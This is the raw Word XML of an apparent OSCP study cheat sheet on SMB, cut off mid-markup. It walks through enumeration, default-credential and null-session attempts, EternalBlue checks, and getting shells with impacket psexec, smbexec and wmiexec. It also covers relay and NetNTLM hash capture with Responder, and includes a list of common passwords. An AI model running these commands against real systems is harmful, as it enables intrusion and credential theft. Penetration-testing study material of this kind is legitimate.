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52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB Enumeration &amp; Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP Cheat Sheet  |  Pete Lenhart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8" w:space="1"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What Is SMB?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB (Server Message Block) is a network file sharing protocol used primarily by Windows. It runs on port 445 (direct) and port 139 (over NetBIOS). SMB is one of the most common attack surfaces on Windows boxes — misconfigurations, weak credentials, and unpatched vulnerabilities make it a gold mine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Key Ports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Port</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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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135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MSRPC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RPC endpoint mapper</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139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NetBIOS-SSN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SMB over NetBIOS (legacy)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445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Microsoft-DS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Primary SMB port — always target this first</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SMB Enumeration — Step by Step</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1 — Initial Fingerprinting with Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Start with nmap scripts to get OS, version, signing status, and check for critical vulns:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sC -sV -p 135,139,445 &lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap --script smb-vuln-ms17-010 &lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap --script smb2-security-mode &lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key things to note from nmap output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows version and build number — tells you what CVEs apply</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB signing enabled/required — if signing is False, relay attacks are possible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SMBv1 enabled — if True, EternalBlue (MS17-010) may apply</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Machine name and domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2 — Try Null/Anonymous Session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Always try unauthenticated access first — many boxes and real-world targets leave this open:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -L //&lt;target_ip&gt; -N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crackmapexec smb &lt;target_ip&gt; --shares -u '' -p ''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient //&lt;target_ip&gt;/IPC$ -N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: NT_STATUS_ACCESS_DENIED means null session is blocked. Move to credential attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3 — Try Default/Common Credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Try these credential combinations with crackmapexec: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Username</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Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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(blank)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Most common HTB finding!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administrator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Default lowercase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admin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Short default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password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Universal default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Password1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Meets complexity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administrator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Welcome1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Common enterprise default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guest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(blank)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Guest account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root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root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Linux-style habits on Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crackmapexec smb &lt;target_ip&gt; -u Administrator -p ''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crackmapexec smb &lt;target_ip&gt; -u Administrator -p 'password'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: [+] with (Pwn3d!) in crackmapexec output = admin access confirmed!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4 — Check for EternalBlue (MS17-010)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If the box is older Windows (XP, 7, Server 2008) always check for EternalBlue:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap --script smb-vuln-ms17-010 &lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">VULNERABLE = use Metasploit exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows 10 / Server 2019 — usually patched, focus on creds instead</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 5 — Enumerate Shares</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you have credentials, list all shares:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crackmapexec smb &lt;target_ip&gt; -u Administrator -p '&lt;pass&gt;' --shares</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -L //&lt;target_ip&gt; -U Administrator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-smbclient Administrator@&lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Common interesting shares to look for:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">C$ — full C drive access (admin only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ADMIN$ — Windows admin share</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IPC$ — inter-process communication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Any custom named shares — often contain sensitive files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 6 — Browse and Download Files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient //&lt;target_ip&gt;/C$ -U Administrator%&lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside smbclient: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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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List files/directories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cd &lt;dir&gt;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Change directory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get &lt;file&gt;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Download a file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mget *</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Download all files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put &lt;file&gt;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Upload a file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recurse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Enable recursive listing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prompt OFF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Disable prompts for mget</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Getting a Shell via SMB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Option 1 — PSExec (most reliable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have admin credentials, PSExec drops you straight into a SYSTEM shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-psexec Administrator@&lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-psexec Administrator:&lt;password&gt;@&lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-psexec Administrator@&lt;target_ip&gt; -no-pass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Option 2 — SMBExec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-smbexec Administrator:&lt;password&gt;@&lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Option 3 — WMIExec (fileless, stealthier)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-wmiexec Administrator:&lt;password&gt;@&lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Option 4 — CrackMapExec Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crackmapexec smb &lt;target_ip&gt; -u Administrator -p '&lt;pass&gt;' -x 'whoami'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crackmapexec smb &lt;target_ip&gt; -u Administrator -p '&lt;pass&gt;' -X 'Get-ChildItem C:\Users'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: -x runs cmd.exe commands, -X runs PowerShell commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Common Flag Locations on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Path</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C:\Users\Administrator\Desktop\flag.txt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Most common</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C:\Users\Administrator\Desktop\root.txt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OSCP style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C:\flag.txt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Root of C drive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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C:\Users\&lt;username&gt;\Desktop\user.txt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User flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Quick search from shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dir C:\Users\Administrator\Desktop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">type C:\Users\Administrator\Desktop\flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tools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Tool</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Install</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Best For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crackmapexec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apt install crackmapexec</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Credential testing, share enum, command exec</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smbclient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apt install smbclient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Browsing and downloading shares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impacket-psexec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pip install impacket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Getting SYSTEM shell with admin creds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impacket-smbexec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pip install impacket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Shell without dropping files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impacket-wmiexec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pip install impacket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Fileless command execution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enum4linux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apt install enum4linux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SMB enumeration, users, shares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nmap smb scripts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built-in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Vuln scanning, signing check, OS detect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responder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apt install responder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Capture NetNTLM hashes via SMB</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hashcat -m 5600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apt install hashcat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Crack NetNTLMv2 hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SMB Signing — What It Means</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB signing prevents man-in-the-middle relay attacks by cryptographically signing SMB packets. Always note the signing status from nmap or crackmapexec output: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Signing Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="624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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Meaning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signing: True /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Relay attacks not possible — need real creds</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color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">signing: False / not required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C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SMB relay attacks possible with Responder + ntlmrelayx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If signing is False and you can trigger SMB auth (e.g. via LFI + UNC path), use:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo responder -I tun0 -v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
